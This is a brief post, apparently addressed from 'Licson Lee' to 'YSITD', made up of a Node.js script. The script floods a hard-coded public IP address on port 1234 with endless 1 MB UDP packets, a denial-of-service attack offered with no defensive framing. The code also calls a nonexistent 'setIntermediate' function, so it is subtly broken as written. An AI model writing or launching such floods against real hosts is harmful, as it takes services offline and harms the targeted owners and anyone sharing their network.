Licson Lee says to YSITD
const dgram = require('dgram'); const socket = dgram.createSocket('udp4'); const buffer = (new Uint8Array(1048576)).fill(0x7f); const port = 1234; const ip = '36.231.143.238'; const flood = function(){ socket.send(buffer, port, ip, function(e){ flood(); }); setIntermediate(function(){ flood(); }); }; flood();